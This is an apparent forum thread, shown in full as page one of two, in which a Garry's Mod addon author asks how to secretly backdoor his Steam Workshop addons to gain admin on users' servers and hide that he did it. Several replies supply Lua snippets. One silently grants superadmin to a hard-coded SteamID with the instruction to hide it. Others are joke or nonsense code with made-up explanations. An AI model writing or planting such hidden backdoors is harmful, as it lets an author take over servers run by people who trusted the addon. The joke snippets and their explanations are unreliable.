Page 1 of 2 12 LastLast
Results 1 to 15 of 18
  1. #1
    evilmystery's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Posts
    37
    Reputation
    10
    Thanks
    5
    My Mood
    Daring

    Gmod Lua Backdoor

    I have some popular addons on steam workshop. I basically want to backdoor them using a lua file to send me their server's ip and make me admin so I can troll. Would be nice if their is a way to mask commands being sent so they dont know I made myself admin or am the one fucking with their server. Would someone mind sharing how to do this as I dont know lua at all.
    Last edited by evilmystery; 07-27-2014 at 11:38 PM.

  2. #2
    I am a man's Avatar
    Join Date
    May 2014
    Gender
    female
    Posts
    23
    Reputation
    10
    Thanks
    10
    My Mood
    Brooding
    Go into console and type:
    say" ';quit load_function/lua";UnloadLua protection.lua || admin_commands.lua; exec defualt;_restart protection

  3. #3
    evilmystery's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Posts
    37
    Reputation
    10
    Thanks
    5
    My Mood
    Daring
    Quote Originally Posted by I am a man View Post
    Go into console and type:
    Thanks really helpful! #sarcasm

  4. #4
    I am a man's Avatar
    Join Date
    May 2014
    Gender
    female
    Posts
    23
    Reputation
    10
    Thanks
    10
    My Mood
    Brooding
    Quote Originally Posted by evilmystery View Post
    Thanks really helpful! #sarcasm
    Why sarcasm? I'll post a video of it working ina bit.

  5. #5
    z346etn56jzd7egth's Avatar
    Join Date
    Dec 2010
    Gender
    male
    Posts
    37
    Reputation
    19
    Thanks
    1,123
    My Mood
    Dead
    Didn't you post this in HF not long ago???

  6. #6
    _Fami's Avatar
    Join Date
    Jul 2014
    Gender
    male
    Posts
    107
    Reputation
    10
    Thanks
    85
    concommand.Add("obvliously_not_a_backdoor", function(player)
    player:SetUserGroup("superadmin")
    end)

  7. The Following User Says Thank You to _Fami For This Useful Post:

    starrock (09-20-2018)

  8. #7
    D3M0L1T10N's Avatar
    Join Date
    May 2012
    Gender
    male
    Posts
    1,364
    Reputation
    19
    Thanks
    656
    Would someone mind sharing how to do this as I dont know lua at all.

    Code:
    I dont know lua at all.
    dont then

  9. #8
    SpeakinAmerican's Avatar
    Join Date
    Jul 2014
    Gender
    male
    Posts
    11
    Reputation
    10
    Thanks
    0
    I will help you as long as you let me put myself in the backdoor aswell.

  10. #9
    omgitsjesse's Avatar
    Join Date
    Mar 2013
    Gender
    male
    Posts
    11
    Reputation
    10
    Thanks
    1
    thanks for the code man

  11. #10
    z346etn56jzd7egth's Avatar
    Join Date
    Dec 2010
    Gender
    male
    Posts
    37
    Reputation
    19
    Thanks
    1,123
    My Mood
    Dead
    Code:
    concommand.Add("backdoor", function(ply)
        ply:PrintMessage(HUD_PRINTTALK, "U r bein backd00red riii noe, kk?")
        ply:SendLua("cam.End3D()")
        print("Backdoor v2.0.0 has succesfully finished backdooring urself.")
    end)
    To explain what the code does, "cam" stands for "Console admin machine", basically, this library controls the console admin machine, this machine controls who can run what commands, basically I ended the machine so when you run a command, the server gets confused and lets you run it anyways, so you can run any command with this code.

    Thank me later.

  12. #11
    stopbanningmefuckers's Avatar
    Join Date
    Aug 2014
    Gender
    male
    Posts
    2
    Reputation
    10
    Thanks
    4
    Quote Originally Posted by kokomika View Post
    Code:
    concommand.Add("backdoor", function(ply)
        ply:PrintMessage(HUD_PRINTTALK, "U r bein backd00red riii noe, kk?")
        ply:SendLua("cam.End3D()")
        print("Backdoor v2.0.0 has succesfully finished backdooring urself.")
    end)
    To explain what the code does, "cam" stands for "Console admin machine", basically, this library controls the console admin machine, this machine controls who can run what commands, basically I ended the machine so when you run a command, the server gets confused and lets you run it anyways, so you can run any command with this code.

    Thank me later.
    ur still a brony

  13. The Following User Says Thank You to stopbanningmefuckers For This Useful Post:

    jamm0 (01-08-2015)

  14. #12
    TylerHax's Avatar
    Join Date
    Dec 2013
    Gender
    male
    Posts
    9
    Reputation
    10
    Thanks
    1
    My Mood
    Amazed
    Here you go: function ADDMIN( ply )
    if ( ply:SteamID() == "YOUR STEAMID HERE" ) then
    ply:SetUserGroup("superadmin")
    end
    end
    hook.Add("PlayerSpawn", "ADDMIN", ADDMIN) PUT ANYWHERE IN CODE, HIDE IT!!!

  15. #13
    D3M0L1T10N's Avatar
    Join Date
    May 2012
    Gender
    male
    Posts
    1,364
    Reputation
    19
    Thanks
    656
    Code:
    lua_run_cl local DetourTable = { [ "GetAdminsByThread" ] = "function0x0c11x" } local function blank() local function GetRCC( cmd, str ) RunConsoleCommand( "exec", "lab" ) end end local function DetourFunc( old, new ) return { DetourTable[ new ], DetourTable[ old ] } end DetourFunc( _G[33 % RealTime(), blank ) if ( DetourFunc ) then GetRCC( "exec_serverside", "lab" ) end
    not that hard lol

  16. #14
    gmoder_'s Avatar
    Join Date
    Nov 2014
    Gender
    male
    Posts
    4
    Reputation
    10
    Thanks
    1
    My Mood
    Cold
    #Newb How would you backdoor your addon after its uploaded?

  17. #15
    Azrius's Avatar
    Join Date
    Jun 2013
    Gender
    female
    Posts
    238
    Reputation
    10
    Thanks
    251
    My Mood
    Bashful
    Quote Originally Posted by gmoder_ View Post
    #Newb How would you backdoor your addon after its uploaded?
    ur done kid

Page 1 of 2 12 LastLast

Similar Threads

  1. Gmod lua money script
    By Zorro31 in forum Garry's Mod Discussions & Help
    Replies: 11
    Last Post: 02-20-2015, 04:59 PM
  2. [Outdated] Gmod Lua+sv_cheats 1 Bypass
    By HoffHorn in forum Garry's Mod Hacks & Cheats
    Replies: 18
    Last Post: 10-18-2013, 02:05 PM
  3. Box esp Gmod .lua
    By coca12345 in forum Steam Games Hacks & Cheats
    Replies: 10
    Last Post: 02-10-2013, 09:44 AM